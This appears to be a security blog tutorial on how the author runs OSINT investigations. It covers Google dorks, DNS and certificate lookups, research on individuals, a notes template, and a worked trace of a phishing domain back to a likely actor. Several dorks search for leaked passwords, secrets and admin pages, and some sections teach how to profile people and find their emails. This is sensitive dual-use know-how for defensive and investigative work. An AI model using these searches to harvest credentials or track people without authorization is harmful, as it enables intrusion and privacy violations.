Skip to content
· 6 min read INFO @Sdmrf

How I Actually Do OSINT Investigations

A realistic look at open source intelligence gathering - the tools I use, the process I follow, and why most OSINT tutorials are overly complicated.

#osint #investigation #threat-intel #tutorial
On this page

OSINT tutorials love to throw 47 tools at you and claim you need all of them. You don’t.

Here’s how I actually approach open source intelligence gathering, stripped of the tool-hoarding and complexity that makes most guides useless.

My Actual Toolkit

The tools I use 90% of the time:

  1. A web browser (Firefox with containers)
  2. Google (with operators)
  3. A notes app (Obsidian)
  4. A few specific lookup sites

That’s it. Seriously.

Yes, there are dozens of specialized tools. Most of the time, you don’t need them. Learn the fundamentals first.

The Process

Step 1: Define What You’re Looking For

This sounds obvious but gets skipped constantly. Before touching any tool, answer:

  • What specific information do I need?
  • What do I already know?
  • What’s my stopping point?

Undirected OSINT is a time sink. “Learn everything about this person/company/domain” leads to hours of rabbit holes with nothing useful.

Good: “Find the email addresses associated with this domain” Bad: “Investigate this domain”

Step 2: Start With Google (Really)

Google dorking isn’t fancy, but it works:

site:linkedin.com "company name" "job title"
site:github.com "company.com" password OR secret OR api
"target name" filetype:pdf
inurl:admin site:target.com

My most-used operators:

OperatorPurpose
site:Restrict to specific domain
filetype:Find specific file types
inurl:Term must be in URL
intitle:Term must be in title
"exact phrase"Exact match
-excludeRemove results with term

Combine them:

site:target.com filetype:pdf -public
site:pastebin.com "target.com" password

90% of my OSINT starts and often ends with Google searches.

Step 3: Domain/Infrastructure Recon

When investigating infrastructure, my flow:

DNS records:

# What's pointing where
dig target.com ANY
dig target.com MX
dig target.com TXT

Historical data:

  • Wayback Machine (web.archive.org) - How did the site look before?
  • SecurityTrails - Historical DNS records
  • crt.sh - Certificate transparency logs

What I’m looking for:

  • Subdomains that reveal internal naming conventions
  • Old content that was removed
  • Email infrastructure hints (MX records)
  • Cloud providers in use (often visible in CNAMEs)

Step 4: Person Research

For researching individuals (with appropriate authorization):

LinkedIn:

  • Current/past employers
  • Connections (often reveals colleagues)
  • Activity (comments, posts reveal interests)
  • Education

Pro tip: Don’t be logged into LinkedIn while researching. Use a browser container or incognito.

Username search: I check common platforms manually. Yes, there are tools that automate this, but they’re often blocked or return false positives. Manual checks:

  • GitHub
  • Twitter/X
  • Reddit
  • HackerNews
  • Stack Overflow
  • Personal blogs (Google: “[name]” blog OR personal)

Email discovery:

  • Hunter.io (limited free searches)
  • RocketReach (same)
  • Google: "[name]" email OR contact site:target.com
  • Check conference talks, PDF author metadata

Step 5: Document Everything

This is where most people fail. You’ll find information, not document it, then forget where you found it.

My notes template:

# Investigation: [Target]
Date: [Date]
Objective: [What am I trying to find]

## Known Information
- [Starting facts]

## Findings
### [Category]
- Finding: [What]
- Source: [URL with archive link]
- Date found: [When]
- Confidence: [High/Medium/Low]

## Questions/Gaps
- [What I still don't know]

## Next Steps
- [Actions to take]

Always archive URLs. Sites disappear. Use archive.today or Wayback Machine to preserve what you find.

What I Don’t Do

Bulk automated scanning

Unless I have explicit permission, I don’t run automated scanners against targets. OSINT means passive collection from public sources, not active probing.

Paying for expensive platforms

For individual research, free tiers and open sources cover 95% of needs. The expensive tools are for teams doing this at scale.

Using sketchy tools

Random OSINT tools from GitHub might work, but they might also leak your queries or be abandoned. Stick to established tools or build your own simple scripts.

Real Example: Investigating a Phishing Domain

Let me walk through a recent investigation (details sanitized):

Objective: Determine who’s behind a phishing domain targeting our company.

Step 1: Domain basics

whois phishing-domain.com
# Registration: Recent (red flag), privacy protected (expected)

dig phishing-domain.com
# Pointed to Cloudflare (hiding real IP)

Step 2: Historical

SecurityTrails showed the domain briefly pointed to a non-Cloudflare IP before being proxied. Got the real host IP.

Step 3: Pivot on IP

# What else is hosted there?
# Shodan, Censys for this

Found 3 other domains on the same IP, all recently registered, all mimicking financial institutions.

Step 4: Infrastructure pattern

All domains used:

  • Same registrar
  • Same hosting
  • Same SSL certificate pattern
  • Same phishing kit (identified by page structure)

Step 5: Phishing kit analysis

Downloaded the phishing page source. Found:

  • Telegram bot token in the JavaScript (exfiltration channel)
  • Russian language comments in the code
  • Unique string that turned up on a Telegram channel discussing “logs”

Outcome: Identified a likely threat actor handle, documented IOCs for blocking, reported to relevant parties.

Total time: ~2 hours. Tools used: Browser, dig, SecurityTrails (free tier), Shodan (free tier).

When You Need More

Sometimes you do need specialized tools:

For malware analysis infrastructure:

  • URLhaus, MalwareBazaar
  • VirusTotal (passive DNS especially)
  • Any.Run, Joe Sandbox

For social media deep dives:

  • Social Bearing (Twitter analytics)
  • Pipl, Spokeo (paid people search)

For image analysis:

  • TinEye, Google reverse image search
  • ExifTool for metadata

For maps/geolocation:

  • Google Earth, Sentinel Hub
  • Mapillary for street-level

But reach for these when basic methods fail, not as a starting point.

Skills Matter More Than Tools

The best OSINT practitioners I know don’t have the most tools. They have:

  1. Curiosity - Asking “what else could this tell me?”
  2. Patience - Good investigations take time
  3. Organization - Documenting findings systematically
  4. Pattern recognition - Connecting disparate pieces
  5. Knowing when to stop - Not every thread needs following

Tools can be learned in hours. These skills take years.

Getting Better

How to improve:

  1. Practice on yourself - What can you find about you?
  2. CTF challenges - TraceLabs, OSINT Dojo
  3. Follow practitioners - Twitter/X OSINT community is active
  4. Read case studies - Bellingcat, OSINT Curious

The best OSINT tool is structured thinking. Everything else is just assistance.

Related Articles

info·9 min read

The Cyber Kill Chain: How Attacks Actually Work

The step-by-step anatomy of a cyberattack - from reconnaissance to objectives. Understanding the full chain so you know where to defend and where to break it.

info·7 min read

Reconnaissance: What Attackers See Before They Strike

Passive and active recon techniques - OSINT, DNS enumeration, port scanning, and attack surface mapping. The first stage of every attack.

info·10 min read

Authentication Attacks: Passwords, Sessions, and Tokens

How login systems break - brute force, credential stuffing, session hijacking, token flaws, and MFA bypass. The complete beginner's guide to auth attacks.